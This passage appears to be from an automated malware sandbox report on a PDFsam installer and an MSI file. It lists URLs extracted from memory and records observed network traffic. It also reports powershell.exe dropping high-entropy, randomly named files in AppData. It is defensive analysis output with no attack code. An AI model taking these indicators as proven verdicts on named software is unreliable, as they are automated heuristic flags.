                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694475221.0000000004AFC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.suscerte.gob.ve0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://pki.registradores.org/normativa/index.htm0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://policy.camerfirma.com0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/arrayTypeEnvelopeBody
                        Source: PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/VersionMismatchSOAP
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.986792614.0000000005720000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/d=
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.986792614.0000000005720000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/le
                        Source: powershell.exe, 00000015.00000002.943270135.00000273B15B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694790490.0000000004A21000.00000004.00000001.sdmpString found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: http://tempuri.org/
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: http://tempuri.org/AddBug
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: http://tempuri.org/CompressSimpleTrackSetup
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: http://tempuri.org/http://tempuri.org/IdIdProductNameProductNameFilesFilesAddAttachesParameterAddAtt
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: http://tempuri.org/http://tempuri.org/Messagedescriptioncpudatadata
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.986131431.00000000052C0000.00000004.00000040.sdmp, PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: http://upclick.com/
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: http://upclick.com/GetLocationInfo
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.986792614.0000000005720000.00000004.00000001.sdmpString found in binary or memory: http://upclick.com/d=
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: http://upclick.com/http://upclick.com/HTTP_X_FORWARDED_FORHTTP_X_FORWARDED_FORGetGeoInfoByHeadersRes
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: http://upclick.com/http://upclick.com/HTTP_X_FORWARDED_FORHTTP_X_FORWARDED_FORREMOTE_ADDRGetGeoInfoB
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.986792614.0000000005720000.00000004.00000001.sdmpString found in binary or memory: http://upclick.com/le
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmp, PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.689712753.0000000004A11000.00000004.00000001.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.689712753.0000000004A11000.00000004.00000001.sdmpString found in binary or memory: http://www.accv.es00
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmp, PDFsamEnhanced7Installer.exe, 00000006.00000003.694606857.0000000004AB1000.00000004.00000001.sdmpString found in binary or memory: http://www.ancert.com/cps0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://www.anf.es
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpString found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://www.anf.es/es/address-direccion.html
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.1011349925.00000000086FF000.00000004.00000001.sdmp, PDFsamEnhanced7Installer.exe, 00000006.00000003.727619780.000000000406F000.00000004.00000010.sdmp, PDFsamEnhanced7Installer.exe, 00000006.00000002.1020087072.0000000008CE0000.00000004.00000001.sdmp, PDFsamEnhanced7Installer.exe, 00000006.00000002.1019536395.0000000008902000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.727308898.000000000403C000.00000004.00000010.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0B1si
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.1011349925.00000000086FF000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0RobotoLight
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694790490.0000000004A21000.00000004.00000001.sdmpString found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.689677218.0000000004A2F000.00000004.00000001.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.690083725.0000000004A2F000.00000004.00000001.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/%
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694606857.0000000004AB1000.00000004.00000001.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmp, PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694475221.0000000004AFC000.00000004.00000001.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-int0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694540995.0000000004ABA000.00000004.00000001.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-std0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://www.defence.gov.au/pki0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp, Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://www.digicert.com/CPS0
                        Source: Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694540995.0000000004ABA000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694540995.0000000004ABA000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca0f
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694540995.0000000004ABA000.00000004.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694453223.0000000004FE4000.00000004.00000001.sdmpString found in binary or memory: http://www.e-me.lv/repository0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694475221.0000000004AFC000.00000004.00000001.sdmpString found in binary or memory: http://www.ecee.gov.pt/dpc0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpString found in binary or memory: http://www.eme.lv/repository0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694540995.0000000004ABA000.00000004.00000001.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0=
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://www.oaticerts.com/repository.
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694453223.0000000004FE4000.00000004.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.696206732.0000000004A20000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://www.rcsc.lt/repository0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694475221.0000000004AFC000.00000004.00000001.sdmpString found in binary or memory: http://www.suscerte.gob.ve/dpc0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694475221.0000000004AFC000.00000004.00000001.sdmpString found in binary or memory: http://www.suscerte.gob.ve/lcr0#
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: http://www.winimage.com/zLibDllNUL
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: https://api-updateservice.pdfsam.org
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: https://api-updateservice.pdfsam.orghttps://stage-api-updateservice.pdfsam.orgInstaller
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: https://bugreport.pdfsam.org/Service.asmxSOAPAction:
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpString found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: https://eca.hinet.net/repository0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/cert
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.696206732.0000000004A20000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: https://paygw.pdfsam.org/redirect/
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: https://paygw.pdfsam.org/redirect/https://downloadenhanced7.pdfsam.org/&configId=common-data.datD:
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.979217766.0000000004A34000.00000004.00000001.sdmpString found in binary or memory: https://pdfsam.org/privacy-policy/
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: https://removing-start.htm
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.689560405.0000000004A3F000.00000004.00000001.sdmpString found in binary or memory: https://repository.luxtrust.lu0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: https://stage-api-updateservice.pdfsam.org
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: https://stats.pdfsam.org/Tracking.asmxLdLuldlucannot
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: https://web.certicamara.com/marco-legal0Z
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.980712276.0000000004AAD000.00000004.00000001.sdmpString found in binary or memory: https://wsgeoip.pdfsam.org/
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: https://wsgeoip.pdfsam.org/ipservice.asmx
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: https://wsgeoip.pdfsam.org/ipservice.asmxSOAPAction:
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpString found in binary or memory: https://www.anf.es/AC/ACTAS/789230
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpString found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpString found in binary or memory: https://www.anf.es/address/)1(0&
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp, Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: https://www.digicert.com/CPS0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694453223.0000000004FE4000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694540995.0000000004ABA000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.688584227.0000000004A46000.00000004.00000001.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
                        Source: unknownHTTP traffic detected: POST /ipservice.asmx HTTP/1.1Accept: text/*SOAPAction: "http://upclick.com/GetLocationInfo"Content-Type: text/xml; charset=utf-8User-Agent: VCSoapClientHost: wsgeoip.pdfsam.orgContent-Length: 346Connection: Keep-AliveCache-Control: no-cache
                        Source: unknownDNS traffic detected: queries for: api-updateservice.pdfsam.org
                        Source: unknownHTTPS traffic detected: 64.15.159.234:443 -> 192.168.2.4:49785 version: TLS 1.2

                        Spam, unwanted Advertisements and Ransom Demands:

                        barindex
                        Writes many files with high entropyShow sources
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 entropy: 7.99599150922Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\OhzWVtYijvsgNyRIPo.SOmGaUYiWFcLyTk entropy: 7.99681389577Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\tsiGmraAFXzD.QzLRespFnHrcXUt entropy: 7.99699863337Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\OJqQGEthlPbxWXVi.IREbMveLuPj entropy: 7.99868316533Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\OfxkdNtvzrul.HfuIkQZjNpzDtBE entropy: 7.99792135658Jump to dropped file
